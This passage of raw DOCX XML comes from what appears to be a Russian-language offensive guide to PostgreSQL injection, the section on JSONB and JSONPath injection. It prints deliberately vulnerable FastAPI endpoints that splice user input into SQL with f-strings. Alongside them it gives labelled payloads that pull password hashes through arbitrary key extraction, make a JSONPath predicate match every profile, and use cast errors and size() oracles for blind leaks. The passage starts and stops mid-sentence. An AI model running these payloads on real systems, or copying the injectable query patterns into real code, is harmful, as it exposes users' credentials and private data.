          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — coercion-правила.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Conditional Expressions — CASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — guarantee на single-branch evaluation.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 boolean-based blind variants</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст.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type coercion bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — практические payload-ы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11.2 jsonb -&gt; и -&gt;&gt; (JSON path injection)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — см. 3.11.0.</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JSONB-операторы PostgreSQL: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 -&gt; 'key'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jsonb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — извлечение поля как jsonb.</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 -&gt;&gt; 'key'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 извлечение поля как text.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 #&gt; '{a,b,c}'</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jsonb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — извлечение по path-array.</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 #&gt;&gt; '{a,b,c}'</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 то же, как text.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 @@ '$.path == "value"'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG 12+) →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 JSONPath-предикат.</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 @? '$.path'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG 12+) →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 существование пути.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Операторы принимают </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">строковые литералы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как имена ключей или JSONPath-выражения. Если строка строится через конкатенацию с user-input, атакующий контролирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON-path как DSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, что эквивалентно injection во вторичный язык.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JSONB-injection классов:</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Arbitrary key extraction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data-&gt;&gt;'$user_key'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> позволяет читать любое поле JSON-документа, не только то, что предполагалось.</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JSONPath injection</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PG 12+ jsonpath имеет операторы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фильтрации,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рекурсивного спуска, арифметику, regex — полноценный мини-DSL.</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Cast confusion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(data-&gt;&gt;'k')::int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(data-&gt;&gt;'k')::regclass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — комбинация с 3.2.x для error-based leak.</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Type erasure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data-&gt;'k'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает jsonb (со всей структурой); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> теряет тип, превращая в text. Атакующий выбирает форму для нужного сценария.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — arbitrary key extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: эндпоинт возвращает publicly-visible поля JSON-документа пользователя. Код:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/profile/{user_id}/field")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_field(user_id: int, field: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 ожидается: field in ['name', 'avatar', 'bio']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q = text(f"SELECT data-&gt;&gt;'{field}' FROM user_profiles WHERE id = :uid")</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 {"uid": user_id})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result.scalar()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">user_profiles.data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — jsonb с публичными и приватными полями:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="10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"name": "Alice",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "avatar": "...",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "bio": "...",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "password_hash": "$2b$12$...",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "email": "alice@co.com",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  "internal_notes": "VIP customer, contact CEO"</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field</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password_hash</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data-&gt;&gt;'password_hash' FROM user_profiles WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Возвращается hash напрямую в HTTP-response. Application-логика ожидала, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это allowed-список из 3 значений; никакой валидации не было.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — JSONPath injection через @@-оператор</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: фильтр по JSON-доку через jsonpath. Код:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/profiles/match")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def match(criteria_path: str, criteria_value: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 = text(f"SELECT id FROM user_profiles WHERE data @@ '$.{criteria_path} == \"{criteria_value}\"'")</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [r[0] for r in result]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Atакующий контролирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">criteria_path</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criteria_value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — оба идут в JSONPath-выражение.</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criteria_path</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password_hash || $.password_hash like_regex "^.*$</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criteria_value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FROM user_profiles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE data @@ '$.password_hash || $.password_hash like_regex "^.*$ == ""'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JSONPath PG 12+ интерпретирует это как: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 ИЛИ regex match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(match anything). Что-то одно из двух — true → WHERE возвращает все профили. Это эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но через jsonpath.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительные JSONPath-возможности для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 (@ == "admin")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — рекурсивный спуск, ищет ключ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на любой глубине документа. Полезно для recon неизвестной структуры.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$.users[*].password_hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — array-iteration через jsonpath. Если документ — массив профилей, leak всех hash.</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 (@.role == "admin")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — фильтрация всех ключей с условием.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$.x.size()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — служебная функция, возвращает размер. Через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.size() &gt; 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — boolean oracle для blind.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — Cast confusion для error-based leak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: эндпоинт ожидает, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data-&gt;&gt;'role_id'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — целое число, и cast-ит в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для использования в дальнейшем коде:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q = text(f"SELECT (data-&gt;&gt;'role_id')::int FROM user_profiles WHERE id = {user_id}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параметр; атакующий может управлять </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
